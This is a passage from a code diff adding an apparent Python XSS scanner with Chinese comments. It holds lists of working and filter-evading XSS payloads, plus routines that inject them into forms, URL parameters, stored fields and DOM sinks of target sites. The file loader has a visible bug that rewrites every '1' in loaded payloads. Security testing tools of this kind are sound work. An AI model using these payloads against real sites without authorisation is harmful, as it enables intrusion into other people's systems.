+            f"<body onload=alert('{self.xss_mark}')>",
+            f"<iframe onload=alert('{self.xss_mark}')></iframe>",
+            f"javascript:alert('{self.xss_mark}')",
+            f"<input autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<select autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<textarea autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<keygen autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<video><source onerror=alert('{self.xss_mark}')>",
+            f"<audio src=x onerror=alert('{self.xss_mark}')>",
+            f"><script>alert('{self.xss_mark}')</script>",
+            f"\"><script>alert('{self.xss_mark}')</script>",
+            f"'><script>alert('{self.xss_mark}')</script>",
+            f"><img src=x onerror=alert('{self.xss_mark}')>"
+        ]
+        
+        # 标准XSS Payload，用于绕过简单的防护
+        standard_payloads = [
+            f"<script>alert(String.fromCharCode(88,83,83,77,65,82,75))</script>".replace("XSSMARK", self.xss_mark),
+            f"<img src=x oneonerrorrror=alert('{self.xss_mark}')>",
+            f"<sCRipT>alert('{self.xss_mark}')</sCriPt>",
+            f"<script/x>alert('{self.xss_mark}')</script>",
+            f"<script ~~~>alert('{self.xss_mark}')</script ~~~>",
+            f"<script>setTimeout('alert(\\'{self.xss_mark}\\')',0)</script>",
+            f"<svg/onload=alert('{self.xss_mark}')>",
+            f"<svg><script>alert('{self.xss_mark}')</script>",
+            f"<svg><animate onbegin=alert('{self.xss_mark}') attributeName=x dur=1s>",
+            f"<svg><a><animate attributeName=href values=javascript:alert('{self.xss_mark}') /><text x=20 y=20>Click Me</text></a>",
+            f"<svg><script xlink:href=data:,alert('{self.xss_mark}') />",
+            f"<math><maction actiontype=statusline xlink:href=javascript:alert('{self.xss_mark}')>Click</maction></math>",
+            f"<iframe src=javascript:alert('{self.xss_mark}')></iframe>",
+            f"<object data=javascript:alert('{self.xss_mark}')></object>",
+            f"<embed src=javascript:alert('{self.xss_mark}')></embed>",
+            f"<link rel=import href=data:text/html;base64,{base64.b64encode(f'<script>alert(\'{self.xss_mark}\')</script>'.encode()).decode()}>",
+            f"<x contenteditable onblur=alert('{self.xss_mark}')>lose focus!</x>",
+            f"<style>@keyframes x{{}}*{{}}50%{{background:url('javascript:alert(\"{self.xss_mark}\")')}}</style><div style=animation-name:x>",
+            f"<sVg OnLoAd=alert('{self.xss_mark}')>",
+            f"<img src=`x`onerror=alert('{self.xss_mark}')>",
+            f"<img src='x'onerror=alert('{self.xss_mark}')>",
+            f"<img src=\"x\"onerror=alert('{self.xss_mark}')>"
+        ]
+        
+        # 高级XSS Payload，用于绕过复杂的防护
+        advanced_payloads = [
+            f"<script>eval(atob('{base64.b64encode(f'alert(\'{self.xss_mark}\')'.encode()).decode()}'))</script>",
+            f"<script>setTimeout(()=>{{eval(atob('{base64.b64encode(f'alert(\'{self.xss_mark}\')'.encode()).decode()}'))}})</script>",
+            f"<script>eval('\\x61\\x6c\\x65\\x72\\x74\\x28\\x27{self.xss_mark}\\x27\\x29')</script>",
+            f"<script>window['al'+'ert']('{self.xss_mark}')</script>",
+            f"<script>var a='al',b='ert';window[a+b]('{self.xss_mark}')</script>",
+            f"<svg><script>123<1>alert('{self.xss_mark}')</script>",
+            f"<svg><script>{{\\n}}alert('{self.xss_mark}')</script>",
+            f"<a href=javascript&colon;alert&lpar;'{self.xss_mark}'&rpar;>Click</a>",
+            f"<svg><animate onbegin=alert('{self.xss_mark}') attributeName=x></svg>",
+            f"<div style=width:1000px;overflow:hidden;>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<img src=x onerror=alert('{self.xss_mark}')>",
+            f"<img src=1 onerror=alert({self._to_js_string(self.xss_mark)})>",
+            f"<script>onerror=alert;throw'{self.xss_mark}';</script>",
+            f"<script>[].filter.call(1,alert,'{self.xss_mark}')</script>",
+            f"<script>Object.defineProperties(window, {{get onerror(){{return {{handleEvent: function(){{alert('{self.xss_mark}');}}}};}}}});throw 'test';</script>",
+            f"<script>({{}}).constructor.constructor('alert(\\'{self.xss_mark}\\')')();</script>",
+            f"<script>String.prototype.replace.call('xss','ss',(_,__)=>eval('aler'+'t(`{self.xss_mark}`)'))</script>",
+            f"<script>location='javascript:alert(\\'{self.xss_mark}\\');</script>",
+            f"<iframe srcdoc=\"<script>parent.alert('{self.xss_mark}')</script>\"></iframe>",
+            f"<script>[]['\\\140cons\\\140'+'tru\\\143tor']('\\\141\\\154\\\145\\\162\\\164\\\50\\\47{self.xss_mark}\\\47\\\51')();</script>",
+            f"<form id='xss'><input name='action' value='alert(\"{self.xss_mark}\")'></form><svg><use href='#xss' /></svg>",
+            f"<img src=x:alert('{self.xss_mark}') onerror=eval(src)>",
+            f"<script src='data:text/javascript,alert(\"{self.xss_mark}\")'></script>",
+            f"<object data='data:text/html;base64,{base64.b64encode(f"<script>alert('{self.xss_mark}')</script>".encode()).decode()}'></object>",
+            f"<meta http-equiv=\"refresh\" content=\"0;url=javascript:alert('{self.xss_mark}')\">",
+            f"<iframe src=\"javascript:alert('{self.xss_mark}')\"></iframe>",
+            f"<form><button formaction=javascript:alert('{self.xss_mark}')>click</button></form>"
+        ]
+        
+        # 根据Payload级别返回对应的Payload列表
+        if self.payload_level == 1:
+            return basic_payloads
+        elif self.payload_level == 2:
+            return basic_payloads + standard_payloads
+        else:
+            return basic_payloads + standard_payloads + advanced_payloads
+    
+    def _load_payloads_from_file(self, filename, default_payloads=None):
+        """
+        从文件中加载Payload
+        
+        Args:
+            filename: Payload文件名
+            default_payloads: 默认Payload列表
+            
+        Returns:
+            list: Payload列表
+        """
+        import os
+        
+        # 获取当前模块所在目录
+        current_dir = os.path.dirname(os.path.abspath(__file__))
+        
+        # 构建Payload文件路径
+        payloads_dir = os.path.join(os.path.dirname(os.path.dirname(current_dir)), 'payloads', 'xss')
+        
+        # 如果目录不存在，则创建
+        if not os.path.exists(payloads_dir):
+            try:
+                os.makedirs(payloads_dir)
+            except Exception as e:
+                logger.error(f"创建Payload目录失败: {str(e)}")
+                return default_payloads
+        
+        payload_file = os.path.join(payloads_dir, filename)
+        
+        # 如果文件不存在，则返回默认Payload
+        if not os.path.exists(payload_file):
+            logger.warning(f"Payload文件不存在: {payload_file}")
+            return default_payloads
+        
+        try:
+            # 读取Payload文件
+            payloads = []
+            with open(payload_file, 'r', encoding='utf-8') as f:
+                for line in f:
+                    line = line.strip()
+                    # 忽略空行和注释
+                    if not line or line.startswith('#'):
+                        continue
+                    # 替换Payload中的占位符
+                    line = line.replace('XSS_MARK', self.xss_mark)
+                    line = line.replace('XSSMARK', self.xss_mark)
+                    line = line.replace('1', self.xss_mark)
+                    payloads.append(line)
+            
+            logger.info(f"从{payload_file}加载了{len(payloads)}个Payload")
+            return payloads
+        except Exception as e:
+            logger.error(f"加载Payload文件失败: {str(e)}")
+            return default_payloads
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的XSS漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        logger.debug(f"扫描表单字段: {field.get('name')} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 首先检测目标技术栈
+        self._detect_technology(url)
+        
+        # 生成唯一的XSS标记
+        original_xss_mark = self.xss_mark
+        self.xss_mark = self._generate_random_string()
+        
+        # 首先发送一个测试请求，用于检测XSS注入点的上下文
+        test_form_data = {}
+        for f in form.get('fields', []):
+            if f.get('name'):
+                if f['name'] == field['name']:
+                    test_form_data[f['name']] = f"XSS_CONTEXT_TEST_{self.xss_mark}"
+                else:
+                    test_form_data[f['name']] = f.get('value', '')
+        
+        # 发送测试请求
+        try:
+            if method == 'POST':
+                test_response = self.http_client.post(action_url, data=test_form_data)
+            else:
+                test_response = self.http_client.get(action_url, params=test_form_data)
+                
+            # 检测XSS注入点的上下文
+            context = self._detect_context(test_response, f"XSS_CONTEXT_TEST_{self.xss_mark}")
+            logger.info(f"检测到XSS注入点上下文: {context}")
+            
+            # 获取针对特定上下文的有效载荷
+            context_payloads = self._get_context_specific_payloads(context)
+            
+            # 获取针对特定WAF的绕过Payload
+            waf_payloads = self._get_waf_bypass_payloads()
+            
+            # 合并标准Payload、上下文特定Payload和WAF绕过Payload
+            all_payloads = self.payloads + context_payloads + waf_payloads
+            
+            # 构建表单数据
+            for payload in all_payloads:
+                form_data = {}
+                
+                # 填充所有字段
+                for f in form.get('fields', []):
+                    if f.get('name'):
+                        # 如果是目标字段，则使用Payload
+                        if f['name'] == field['name']:
+                            form_data[f['name']] = payload
+                        else:
+                            # 否则使用默认值
+                            form_data[f['name']] = f.get('value', '')
+                
+                # 提交表单
+                try:
+                    logger.debug(f"测试Payload: {payload}")
+                    
+                    if method == 'POST':
+                        response = self.http_client.post(action_url, data=form_data)
+                    else:
+                        response = self.http_client.get(action_url, params=form_data)
+                    
+                    # 检查响应中是否存在XSS
+                    if response and self._check_xss_in_response(response, payload):
+                        # 还原原始XSS标记
+                        xss_mark = self.xss_mark
+                        self.xss_mark = original_xss_mark
+                        
+                        return {
+                            'type': 'XSS',
+                            'subtype': 'Reflected XSS',
+                            'url': url,
+                            'form_action': action_url,
+                            'form_method': method,
+                            'parameter': field['name'],
+                            'payload': payload,
+                            'context': context,
+                            'severity': '高',
+                            'description': f"在表单字段'{field['name']}'中发现XSS漏洞",
+                            'details': {
+                                "表单操作": action_url,
+                                "表单方法": method,
+                                "漏洞字段": field['name'],
+                                "有效载荷": payload,
+                                "注入上下文": context,
+                                "技术栈": str(self.tech_info)
+                            },
+                            'recommendation': "过滤用户输入，使用适当的输出编码，实施内容安全策略(CSP)，考虑使用现代框架的XSS保护"
+                        }
+                except Exception as e:
+                    logger.error(f"测试Payload时发生错误: {str(e)}")
+                    
+        except Exception as e:
+            logger.error(f"扫描表单时发生错误: {str(e)}")
+            
+        # 还原原始XSS标记
+        self.xss_mark = original_xss_mark
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的XSS漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        logger.debug(f"扫描URL参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 首先检测目标技术栈
+        self._detect_technology(url)
+        
+        # 生成唯一的XSS标记
+        original_xss_mark = self.xss_mark
+        self.xss_mark = self._generate_random_string()
+        
+        # 首先发送一个测试请求，用于检测XSS注入点的上下文
+        test_params = query_params.copy()
+        test_params[param] = f"XSS_CONTEXT_TEST_{self.xss_mark}"
+        
+        # 发送测试请求
+        try:
+            test_response = self.http_client.get(f"{base_url}?{urlencode(test_params)}")
+            
+            # 检测XSS注入点的上下文
+            context = self._detect_context(test_response, f"XSS_CONTEXT_TEST_{self.xss_mark}")
+            logger.info(f"检测到XSS注入点上下文: {context}")
+            
+            # 获取针对特定上下文的有效载荷
+            context_payloads = self._get_context_specific_payloads(context)
+            
+            # 获取针对特定WAF的绕过Payload
+            waf_payloads = self._get_waf_bypass_payloads()
+            
+            # 合并标准Payload、上下文特定Payload和WAF绕过Payload
+            all_payloads = self.payloads + context_payloads + waf_payloads
+            
+            # 测试每个Payload
+            for payload in all_payloads:
+                try:
+                    # 构建注入参数
+                    inject_params = query_params.copy()
+                    inject_params[param] = payload
+                    
+                    logger.debug(f"测试Payload: {payload}")
+                    
+                    # 发送注入请求
+                    response = self.http_client.get(f"{base_url}?{urlencode(inject_params)}")
+                    
+                    # 检查响应中是否存在XSS
+                    if response and self._check_xss_in_response(response, payload):
+                        # 还原原始XSS标记
+                        xss_mark = self.xss_mark
+                        self.xss_mark = original_xss_mark
+                        
+                        return {
+                            'type': 'XSS',
+                            'subtype': 'Reflected XSS',
+                            'url': url,
+                            'parameter': param,
+                            'payload': payload,
+                            'context': context,
+                            'severity': '高',
+                            'description': f"在URL参数'{param}'中发现XSS漏洞",
+                            'details': {
+                                "URL": url,
+                                "漏洞参数": param,
+                                "有效载荷": payload,
+                                "注入上下文": context,
+                                "技术栈": str(self.tech_info)
+                            },
+                            'recommendation': "过滤用户输入，使用适当的输出编码，实施内容安全策略(CSP)，考虑使用现代框架的XSS保护"
+                        }
+                except Exception as e:
+                    logger.error(f"测试Payload时发生错误: {str(e)}")
+        except Exception as e:
+            logger.error(f"扫描参数时发生错误: {str(e)}")
+            
+        # 还原原始XSS标记
+        self.xss_mark = original_xss_mark
+        return None
+    
+    def scan_dom(self, url):
+        """
+        扫描DOM型XSS漏洞
+        
+        Args:
+            url: 页面URL
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not self.use_browser or not self.driver:
+            logger.debug("浏览器未初始化，无法扫描DOM型XSS")
+            return None
+            
+        logger.info(f"扫描DOM型XSS: {url}")
+        
+        # 检测目标技术栈
+        self._detect_technology(url)
+        
+        # DOM XSS常见的危险源和接收器
+        dangerous_sources = [
+            # 网址/位置相关
+            'document.URL', 'document.documentURI', 'document.URLUnencoded', 'document.baseURI',
+            'location', 'location.href', 'location.search', 'location.hash', 'location.pathname',
+            
+            # 存储相关
+            'localStorage', 'sessionStorage', 
+            
+            # 文档/cookie相关
+            'document.cookie', 'document.referrer',
+            
+            # 窗口相关
+            'window.name', 'history.pushState', 'history.replaceState',
+            
+            # 消息传递
+            'postMessage', 'onmessage', 'addEventListener("message"', 
+            
+            # 跨域通信
+            'XMLHttpRequest', 'fetch', 'jQuery.ajax', '$.ajax',
+            
+            # 框架特定
+            'eval', 'setTimeout', 'setInterval', 'Function', 
+            'document.write', 'document.writeln', 'innerHTML', 'outerHTML',
+            'insertAdjacentHTML', 'execScript',
+            
+            # 现代框架源
+            'dangerouslySetInnerHTML', 'v-html', 'ng-bind-html'
+        ]
+        
+        # DOM XSS常见的危险接收器
+        dangerous_sinks = [
+            # HTML操作
+            'innerHTML', 'outerHTML', 'document.write', 'document.writeln', 'insertAdjacentHTML',
+            
+            # JavaScript执行
+            'eval', 'setTimeout', 'setInterval', 'Function', 'execScript',
+            
+            # URL操作
+            'location', 'location.href', 'location.replace', 'location.assign', 'location.pathname',
+            'open', 'element.src', 'postMessage',
+            
+            # 框架特定
+            'dangerouslySetInnerHTML', 'v-html', 'ng-bind-html', 'bypassSecurityTrust'
+        ]
+        
+        # 先尝试检测页面中是否存在可能的DOM XSS
+        try:
+            # 加载页面
+            self.driver.get(url)
+            time.sleep(2)  # 给页面一些加载和执行的时间
+            
+            # 检查页面中是否存在危险的源和接收器
+            vulnerable_sources_found = []
+            vulnerable_sinks_found = []
+            
+            # 使用JavaScript检查危险源和接收器
+            source_sink_check_result = self.driver.execute_script("""
+                var results = {
+                    'sources': [],
+                    'sinks': [],
+                    'source_to_sink': [],
+                    'event_handlers': [],
+                    'url_based_sources': []
+                };
+                
+                // 捕获页面中的JavaScript源代码进行分析
+                var allScripts = document.querySelectorAll('script');
+                var allScriptContents = Array.from(allScripts)
+                    .filter(script => !script.src)  // 仅使用内联脚本
+                    .map(script => script.textContent)
+                    .join('\\n');
+                
+                // 分析源 
+                var sources = arguments[0];
+                for (var i = 0; i < sources.length; i++) {
+                    if (allScriptContents.indexOf(sources[i]) !== -1) {
+                        results.sources.push(sources[i]);
+                    }
+                }
+                
+                // 分析接收器
+                var sinks = arguments[1];
+                for (var i = 0; i < sinks.length; i++) {
+                    if (allScriptContents.indexOf(sinks[i]) !== -1) {
+                        results.sinks.push(sinks[i]);
+                    }
+                }
+                
+                // 检测URL参数可能直接输入到危险接收器
+                try {
+                    var urlParams = new URLSearchParams(window.location.search);
+                    for (var param of urlParams) {
+                        var paramName = param[0];
+                        var paramValue = param[1];
+                        
+                        // 在JavaScript中查找对URL参数的引用
+                        if (allScriptContents.indexOf(paramName) !== -1) {
+                            // 检查是否有参数值直接传入危险接收器
+                            for (var i = 0; i < sinks.length; i++) {
+                                var sink = sinks[i];
+                                if (allScriptContents.indexOf(paramName + "." + sink) !== -1 ||
+                                    allScriptContents.indexOf(paramName + "['" + sink + "']") !== -1 ||
+                                    allScriptContents.indexOf(paramName + '["' + sink + '"]') !== -1) {
+                                    results.url_based_sources.push({
+                                        'param': paramName,
+                                        'sink': sink
+                                    });
+                                }
+                            }
+                        }
+                    }
+                } catch (e) {
+                    console.error("URL参数分析出错", e);
+                }
+                
+                // 检查流向
+                for (var i = 0; i < results.sources.length; i++) {
+                    var source = results.sources[i];
+                    for (var j = 0; j < results.sinks.length; j++) {
+                        var sink = results.sinks[j];
+                        // 简单检查源到接收器的数据流
+                        if (allScriptContents.indexOf(source + "." + sink) !== -1 ||
+                            allScriptContents.indexOf(source + " " + sink) !== -1 ||
+                            allScriptContents.indexOf(sink + "(" + source) !== -1) {
+                            results.source_to_sink.push({
+                                'source': source,
+                                'sink': sink
+                            });
+                        }
+                    }
+                }
+                
+                // 检查事件处理程序
+                var allElements = document.querySelectorAll('*');
+                var eventAttributes = ['onclick', 'onload', 'onmouseover', 'onerror',
+                                     'onfocus', 'onblur', 'onkeyup', 'onkeydown',
+                                     'onchange', 'onsubmit', 'onreset', 'onselect'];
+                
+                for (var i = 0; i < allElements.length; i++) {
+                    var element = allElements[i];
+                    for (var j = 0; j < eventAttributes.length; j++) {
+                        var attr = eventAttributes[j];
+                        if (element.hasAttribute(attr)) {
+                            var attrValue = element.getAttribute(attr);
+                            // 检查事件处理程序是否使用了危险接收器或者直接来自URL参数
+                            for (var k = 0; k < sinks.length; k++) {
+                                var sink = sinks[k];
+                                if (attrValue.indexOf(sink) !== -1) {
+                                    results.event_handlers.push({
+                                        'element': element.tagName,
+                                        'event': attr,
+                                        'value': attrValue,
+                                        'sink': sink
+                                    });
+                                }
+                            }
+                            
+                            try {
+                                var urlParams = new URLSearchParams(window.location.search);
+                                for (var param of urlParams) {
+                                    var paramName = param[0];
+                                    if (attrValue.indexOf(paramName) !== -1) {
+                                        results.event_handlers.push({
+                                            'element': element.tagName,
+                                            'event': attr,
+                                            'value': attrValue,
+                                            'urlParam': paramName
+                                        });
+                                    }
+                                }
+                            } catch (e) {}
+                        }
+                    }
+                }
+                
+                return results;
+            """, dangerous_sources, dangerous_sinks)
+            
+            # 如果找到了可能的DOM XSS漏洞
+            if (source_sink_check_result['sources'] or 
+                source_sink_check_result['sinks'] or 
+                source_sink_check_result['source_to_sink'] or
+                source_sink_check_result['event_handlers'] or
+                source_sink_check_result['url_based_sources']):
+                
+                logger.info(f"发现可能的DOM XSS：{source_sink_check_result}")
+                
+                # 现在尝试用XSS有效载荷确认漏洞
+                confirmed = False
+                confirmation_payload = None
+                confirmation_param = None
+                
+                # 解析URL查询参数
+                parsed_url = urlparse(url)
+                query_params = dict(parse_qsl(parsed_url.query))
+                base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+                
+                # 对每个URL参数尝试注入XSS有效载荷
+                for param in query_params.keys():
+                    # 尝试多种DOM XSS有效载荷
+                    dom_xss_payloads = [
+                        f"<img src=x onerror=alert('{self.xss_mark}')>",
+                        f"'-alert('{self.xss_mark}')-'",
+                        f"\\'-alert('{self.xss_mark}')-\\'",
+                        f"javascript:alert('{self.xss_mark}')",
+                        f"';alert('{self.xss_mark}');//",
+                        f"\";alert('{self.xss_mark}');//",
+                        f"')alert('{self.xss_mark}');//",
+                        f"\")alert('{self.xss_mark}');//",
+                        f"</script><img src=x onerror=alert('{self.xss_mark}')>",
+                        f"{{}};alert('{self.xss_mark}')"
+                    ]
+                    
+                    for payload in dom_xss_payloads:
+                        try:
+                            # 构建注入参数
+                            test_params = query_params.copy()
+                            test_params[param] = payload
+                            
+                            # 构建测试URL
+                            test_url = f"{base_url}?{urlencode(test_params)}"
+                            
+                            # 访问测试URL
+                            self.driver.get(test_url)
+                            time.sleep(1)  # 给页面一些加载和执行的时间
+                            
+                            # 检查是否有弹窗
+                            try:
+                                alert = self.driver.switch_to.alert
+                                alert_text = alert.text
+                                alert.dismiss()
+                                
+                                if self.xss_mark in alert_text:
+                                    confirmed = True
+                                    confirmation_payload = payload
+                                    confirmation_param = param
+                                    break
+                            except:
+                                # 如果没有弹窗，也可能XSS是通过DOM修改而不是alert触发的
+                                page_source = self.driver.page_source
+                                if self.xss_mark in page_source:
+                                    confirmed = True
+                                    confirmation_payload = payload
+                                    confirmation_param = param
+                                    break
+                        except Exception as e:
+                            logger.debug(f"DOM XSS确认测试出错: {str(e)}")
+                            
+                    if confirmed:
+                        break
+                
+                # 无论是否确认了DOM XSS，都返回可能的漏洞信息
+                return {
+                    'type': 'XSS',
+                    'subtype': 'DOM XSS',
+                    'url': url,
+                    'parameter': confirmation_param if confirmed else None,
+                    'payload': confirmation_payload if confirmed else None,
+                    'severity': '高' if confirmed else '中',
+                    'description': "确认存在DOM XSS漏洞" if confirmed else "可能存在DOM XSS漏洞",
+                    'details': {
+                        "URL": url,
+                        "危险源": source_sink_check_result['sources'],
+                        "危险接收器": source_sink_check_result['sinks'],
+                        "源到接收器流": source_sink_check_result['source_to_sink'],
+                        "可疑事件处理": source_sink_check_result['event_handlers'],
+                        "URL参数流向": source_sink_check_result['url_based_sources'],
+                        "确认状态": "已确认" if confirmed else "未确认",
+                        "确认参数": confirmation_param if confirmed else None,
+                        "确认有效载荷": confirmation_payload if confirmed else None,
+                        "技术栈": str(self.tech_info)
+                    },
+                    'recommendation': "避免使用eval、document.write等危险函数，不要将不可信数据直接插入到HTML或JavaScript中，使用DOMPurify等库过滤输入，启用CSP策略。"
+                }
+                
+        except TimeoutException:
+            logger.warning(f"页面加载超时: {url}")
+        except WebDriverException as e:
+            logger.error(f"浏览器发生错误: {str(e)}")
+        except Exception as e:
+            logger.error(f"扫描DOM XSS时发生错误: {str(e)}")
+            
+        return None
+    
+    def scan_stored_xss(self, url, form, field, verify_url):
+        """
+        扫描存储型XSS漏洞
+        
+        Args:
+            url: 提交表单的URL
+            form: 表单信息
+            field: 字段信息
+            verify_url: 验证URL
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        logger.debug(f"扫描存储型XSS: {field.get('name')} @ {url}, 验证URL: {verify_url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 首先检测目标技术栈
+        self._detect_technology(url)
+        
+        # 获取针对特定WAF的绕过Payload
+        waf_payloads = self._get_waf_bypass_payloads()
+        
+        # 合并标准Payload和WAF绕过Payload
+        all_payloads = self.payloads + waf_payloads
+        
+        # 构建表单数据
+        for payload in all_payloads:
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 提交表单
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查表单提交后，访问验证URL是否包含Payload
+                verify_response = self.http_client.get(verify_url)
+                if not verify_response:
+                    continue
+                    
+                # 检查响应中是否包含Payload
+                if self._check_xss_in_response(verify_response, payload):
+                    return {
+                        'type': 'XSS',
+                        'subtype': 'Stored XSS',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现存储型XSS漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在存储型XSS漏洞，可以执行任意JavaScript代码",
+                        'recommendation': "对用户输入进行过滤和编码，使用安全的前端框架，启用CSP策略"
+                    }
+            except Exception as e:
+                logger.error(f"扫描存储型XSS时发生错误: {str(e)}")
+                
+        return None
+    
+    def _detect_technology(self, url):
+        """
+        检测网站使用的技术栈
+        
+        Args:
+            url: 目标URL
+        """
+        try:
+            # 发送请求
+            response = self.http_client.get(url)
+            if not response:
+                return
+                
+            # 使用技术检测器检测
+            self.tech_info = self.tech_detector.detect(response)
+            
+            frameworks = ", ".join(self.tech_info.get('frontend', []))
+            backends = ", ".join(self.tech_info.get('backend', []))
+            servers = ", ".join(self.tech_info.get('server', []))
+            wafs = ", ".join(self.tech_info.get('waf', []))
+            
+            if frameworks:
+                logger.info(f"检测到前端框架: {frameworks}")
+            if backends:
+                logger.info(f"检测到后端技术: {backends}")
+            if servers:
+                logger.info(f"检测到服务器: {servers}")
+            if wafs:
+                logger.info(f"检测到WAF: {wafs}")
+                
+                # 获取WAF绕过技术
+                bypass_techniques = self.tech_detector.get_waf_bypass_techniques(self.tech_info.get('waf', []))
+                for waf, techniques in bypass_techniques.items():
+                    logger.info(f"可能的{waf} WAF绕过技术:")
+                    for i, technique in enumerate(techniques, 1):
+                        logger.info(f"  {i}. {technique}")
+        except Exception as e:
+            logger.error(f"检测技术栈时发生错误: {str(e)}")
+    
+    def _get_waf_bypass_payloads(self):
+        """
+        根据检测到的WAF，获取对应的绕过Payload
+        
+        Returns:
+            list: 绕过Payload列表
+        """
+        if not self.tech_info.get('waf'):
+            return []
+            
+        # 使用WAF绕过专用的Payload
+        if self.waf_bypass_payloads:
+            return self.waf_bypass_payloads
+            
+        # 如果没有预加载的WAF绕过Payload，则返回空列表
+        return []
+    
+    def _check_xss_in_response(self, response, payload):
+        """
+        检查响应中是否包含XSS Payload
+        
+        Args:
+            response: 响应对象
+            payload: XSS Payload
+            
+        Returns:
+            bool: 是否包含Payload
+        """
+        # 如果响应为空，则返回False
+        if not response or not response.text:
+            return False
+            
+        # 检查响应中是否包含XSS标记
+        if self.xss_mark in response.text:
+            return True
+            
+        # 解析响应内容
+        try:
+            soup = BeautifulSoup(response.text, 'html.parser')
+            
+            # 检查是否存在alert弹窗（仅在使用浏览器时有效）
+            if self.use_browser and self.driver:
+                try:
+                    self.driver.get("data:text/html;charset=utf-8," + response.text)
+                    time.sleep(1)
+                    
+                    # 检查是否有弹窗
+                    alert = self.driver.switch_to.alert
+                    alert_text = alert.text
+                    alert.dismiss()
+                    
+                    if self.xss_mark in alert_text:
+                        return True
+                except:
+                    pass
+                    
+                # 额外检查DOM变化
+                try:
+                    # 执行JavaScript检查DOM是否有变化
+                    has_xss = self.driver.execute_script(f"""
+                        return (function() {{
+                            var hasXSS = false;
+                            
+                            // 检查是否有新添加的脚本标签
+                            var scripts = document.querySelectorAll('script');
+                            for (var i = 0; i < scripts.length; i++) {{
+                                if (scripts[i].textContent.includes('{self.xss_mark}')) {{
+                                    hasXSS = true;
+                                    break;
+                                }}
+                            }}
+                            
+                            // 检查是否有包含XSS标记的DOM节点
+                            var elements = document.querySelectorAll('*');
+                            for (var i = 0; i < elements.length; i++) {{
+                                // 检查元素内容
+                                if (elements[i].innerText && elements[i].innerText.includes('{self.xss_mark}')) {{
+                                    hasXSS = true;
+                                    break;
+                                }}
+                                
+                                // 检查属性值
+                                var attrs = elements[i].attributes;
+                                for (var j = 0; j < attrs.length; j++) {{
+                                    if (attrs[j].value.includes('{self.xss_mark}')) {{
+                                        hasXSS = true;
+                                        break;
+                                    }}
+                                }}
+                            }}
+                            
+                            // 检查框架XSS（React、Vue等）
+                            if (window.React || window._REACT_DEVTOOLS_GLOBAL_HOOK_ || 
+                                window.__REACT_DEVTOOLS_GLOBAL_HOOK__ || 
+                                document.querySelector('[data-reactroot]')) {{
+                                // React应用
+                                try {{
+                                    var reactElements = document.querySelectorAll('*');
+                                    for (var i = 0; i < reactElements.length; i++) {{
+                                        var reactInstance = reactElements[i].__reactInternalInstance$ || 
+                                                        reactElements[i]._reactInternalInstance ||
+                                                        reactElements[i]._reactInternalFiber;
+                                        if (reactInstance && 
+                                            JSON.stringify(reactInstance).includes('{self.xss_mark}')) {{
+                                            hasXSS = true;
+                                            break;
+                                        }}
+                                    }}
+                                }} catch (e) {{}}
+                            }}
+                            
+                            if (window.Vue || window.__VUE_DEVTOOLS_GLOBAL_HOOK__) {{
+                                // Vue应用
+                                try {{
+                                    var vueElements = document.querySelectorAll('*');
+                                    for (var i = 0; i < vueElements.length; i++) {{
+                                        var vueInstance = vueElements[i].__vue__ || vueElements[i].__vue_app__;
+                                        if (vueInstance && 
+                                            JSON.stringify(vueInstance).includes('{self.xss_mark}')) {{
+                                            hasXSS = true;
+                                            break;
+                                        }}
+                                    }}
+                                }} catch (e) {{}}
+                            }}
+                            
+                            // 检查Angular应用
+                            if (window.ng || document.querySelector('[ng-app]') || 
+                                document.querySelector('[data-ng-app]') ||
+                                document.querySelector('[ng-controller]')) {{
+                                try {{
+                                    var ngElements = document.querySelectorAll('*[ng-bind], *[data-ng-bind], *[ng-model], *[data-ng-model]');
+                                    for (var i = 0; i < ngElements.length; i++) {{
+                                        if (ngElements[i].textContent && 
+                                            ngElements[i].textContent.includes('{self.xss_mark}')) {{
+                                            hasXSS = true;
+                                            break;
+                                        }}
+                                    }}
+                                }} catch (e) {{}}
+                            }}
+                            
+                            return hasXSS;
+                        }})();
+                    """)
+                    
+                    if has_xss:
+                        return True
+                except Exception as e:
+                    logger.debug(f"DOM检查失败: {str(e)}")
+            
+            # 检查特定标签
